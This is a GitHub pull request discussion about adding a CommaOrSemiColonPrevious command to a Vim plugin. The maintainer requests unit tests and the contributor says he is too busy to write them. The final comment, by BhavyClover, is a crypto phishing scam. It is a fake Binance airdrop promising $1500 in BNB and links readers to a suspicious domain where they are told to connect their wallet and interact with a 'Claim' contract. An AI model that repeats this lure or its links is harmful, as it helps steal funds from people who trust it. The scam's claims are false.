### PR TITLE
Add CommaOrSemiColonPrevious command and fix block formatted arrays

### PR DESCRIPTION
**Pull request by KroniK907**
Please read the commit messages for both commits for details on each.

### CODE REVIEW

**Comment by lfilho** [comment]
Hey @KroniK907 , thanks for the contribution! Interesting idea!

But they seem pretty compley by nature, so it would be ace if you could write some unit tests to safe guard... I know we have a poor coverague right now but it would be nice not to make it worse...

In the very least you should add a couple lines more to the `example` files and manually test your changes there, and test everything else in the files.

Thanks again! 💪

**Comment by KroniK907** [comment]
I'm actually pretty new to unit testing in general and haven't messed with vim unit testing before. Looking at your existing tests it doesn't look too complicated, so I'd be happy to give it a go. 

I think the CommaOrSemiColonPrevious command might have a few kinks when it comes to anything that would normally require the current cursor position, so it might be useful to determine where it will fail.

Overall, my intention with the Previous command is not to provide some complete solution for automatically checking code, but simply providing a tool that a user can use to come up with more complex mappings if they wish. 

The above commits shouldn't impact the existing functionality in any way (besides fixing the block array issue). 

I'll try to get to adding some tests for the Previous command but I'm busier than expected this week and might not get to it for a few days.

**Comment by lfilho** [comment]
Hey @KroniK907 any news here? Thanks

**Comment by KroniK907** [comment]
I'm afraid I'm too busy at this point to implement any testing. The code works well enough for me with about 20 other plugins. But I cant verify that unit testing wouldn't bring out some unknown issue with it. 

Sorry to code and run but I'm just too busy to do more than what I already have.

**Comment by lfilho** [comment]
Hey @KroniK907 revisiting this... Something came to mind... If the purpose of the Previous command, as you stated, is for auto inserting a comma or semi colon after pressing enter, wouldn't the auto insertion feature cover that for you? https://github.com/lfilho/cosco.vim#auto-commaorsemicolon-insertion-mode-experimental

**Comment by lfilho** [comment]
@KroniK907 ?

**Comment by BhavyClover** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[Claim Now](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Pull request closed without merging**
